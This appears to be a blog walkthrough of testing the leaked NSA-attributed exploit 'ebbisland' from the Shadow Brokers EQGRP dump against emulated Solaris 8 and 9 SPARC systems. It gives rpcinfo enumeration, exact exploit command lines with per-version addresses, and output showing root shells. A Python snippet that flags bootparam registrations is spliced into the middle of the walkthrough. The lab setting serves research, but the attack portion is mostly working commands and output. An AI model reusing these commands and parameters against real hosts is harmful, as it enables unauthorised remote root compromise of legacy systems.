Now that Solaris 5.6, 5.7, 5.8 and 5.9 run fully virtualized under qemu-system-sparc on an x86_64 Linux host, we can move on to testing the Solaris hacking tools from the Shadow Brokers leak, mainly the notorious ebbisland.
If you want to experiment, a git clone of the EQGRP dump is located here: https://github.com/x0rz/EQGRP
So let's fire up our first test case: Solaris 5.9 (sparc) under qemu-system-sparc, set up as described here (https://astr0baby.wordpress.com/2019/02/23/running-solaris-2-9-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/). We need to make sure rpc.bootparamd is running on the target, since this example needs it.
From our host Linux machine we first verify that the vulnerable RPC service (bootparam) is registered on the target. You must be able to reach the target system's TCP port on which the chosen RPC program is listening, so we use rpcinfo to query the remote RPC services.
Make sure rpcinfo is installed: apt-get install rpcbind nfs-common
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100232   10   udp  32772
    100083    1   tcp  32771
    100221    1   tcp  32772
    100229    1   tcp  32773
    100229    2   tcp  32773
    100230    1   tcp  32774
    100242    1   tcp  32775
    100422    1   tcp  32776
    100068    2   udp  32773
    100068    3   udp  32773
    100068    4   udp  32773
    100068    5   udp  32773
    100011    1   udp  32774  rquotad
    100001    2   udp  32775  rstatd
    100001    3   udp  32775  rstatd
    100001    4   udp  32775  rstatd
    100002    2   udp  32776  rusersd
    100002    3   udp  32776  rusersd
    100002    2   tcp  32777  rusersd
    100002    3   tcp  32777  rusersd
    100008    1   udp  32777  walld
    100012    1   udp  32778  sprayd
    100024    1   udp  32779  status
    100024    1   tcp  32778  status
    100133    1   udp  32779
    100133    1   tcp  32778
    100021    1   udp   4045  nlockmgr
    100021    2   udp   4045  nlockmgr
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100021    1   tcp   4045  nlockmgr
    100021    2   tcp   4045  nlockmgr
    100021    3   tcp   4045  nlockmgr
    100021    4   tcp   4045  nlockmgr
    300598    1   udp  32785
    300598    1   tcp  32782
 805306368    1   udp  32785
 805306368    1   tcp  32782
    100249    1   udp  32786
    100249    1   tcp  32783
1289637086    5   tcp  32784
1289637086    1   tcp  32784
    100026    1   udp  32806  bootparam
    100026    1   tcp  32848  bootparam
We can see from the above that the vulnerable bootparam program (100026) is registered on ports 32806 (udp) and 32848 (tcp), so we can execute ebbisland against the TCP port as follows
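Auditing which RPC programs a legacy Solaris host still registers is the defender's side of the rpcinfo query above. The following is an added example, not code from the original post or from any EQGRP tool: it parses rpcinfo -p output into records and flags program number 100026 (bootparam); the abridged sample output and the flagged-program table are constructed for the example.

```python
"""Parse `rpcinfo -p <host>` output and flag RPC programs a legacy Solaris
host should not expose. Added example for auditing a host's RPC registrations;
it is not part of the original post nor of any tool in the EQGRP dump."""
import re
from collections import namedtuple

RpcEntry = namedtuple("RpcEntry", "program vers proto port service")

# Program numbers to flag; 100026 is bootparam, the service the post queries.
FLAGGED_PROGRAMS = {100026: "bootparam"}

# Constructed sample: an abridged copy of the rpcinfo -p output shown above.
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100232   10   udp  32772
    100011    1   udp  32774  rquotad
    100021    1   tcp   4045  nlockmgr
    100026    1   udp  32806  bootparam
    100026    1   tcp  32848  bootparam
"""

# program, version, proto, port, optional service name (absent when unresolved)
_LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")

def parse_rpcinfo(text):
    """Return one RpcEntry per registration line; the header and junk are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            prog, vers, proto, port, svc = m.groups()
            entries.append(RpcEntry(int(prog), int(vers), proto, int(port), svc or ""))
    return entries

def registrations(entries, program):
    """Map proto -> sorted list of ports on which `program` is registered."""
    found = {}
    for e in entries:
        if e.program == program:
            found.setdefault(e.proto, set()).add(e.port)
    return {proto: sorted(ports) for proto, ports in found.items()}

def flagged_registrations(entries, flagged=FLAGGED_PROGRAMS):
    """{name: {proto: [ports]}} for every flagged program the host registers,
    so a host still exposing bootparam shows up in an inventory sweep."""
    report = {name: registrations(entries, num) for num, name in flagged.items()}
    return {name: regs for name, regs in report.items() if regs}
```

Feed it the captured output of rpcinfo -p for each host; an empty result from flagged_registrations means none of the flagged programs is registered.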
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908
The exploit takes a couple of seconds to complete and is quite reliable
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908
./ebbisland version 1.0.0.0
************************************
**** WARNING - non - inetd mode ****
************************************
auth len 192
lz addr: 0x6e9f4, codeAddr: 0x6e94c jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x6e70c -> 0x6eb08
Ok to continue? y
Exploit string:
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
pwd
/usr/sbin
uname -a
SunOS solaris9 5.9 Generic_118558-34 sun4m sparc SUNW,SPARCstation-5
The same approach was tested against Solaris 5.8 (sparc); only the address passed with -A was different.
Querying the remote RPC service:
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10 | grep bootparam
    100026    1   udp  32806  bootparam
    100026    1   tcp  32854  bootparam
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32854 -r 100026 -X -N -A 0x7c760
./ebbisland version 1.0.0.0
************************************
**** WARNING - non - inetd mode ****
************************************
auth len 192
lz addr: 0x7c84c, codeAddr: 0x7c7a4 jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x7c564 -> 0x7c960
Ok to continue? y
Exploit string:
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
uname -a
SunOS solaris8 5.8 Generic_108528-13 sun4m sparc SUNW,SPARCstation-5
The parameters were taken from the original ebbisland help file located here:
https://fdik.org/EQGRP/Linux/etc/opscript.txt
Video demonstration of the above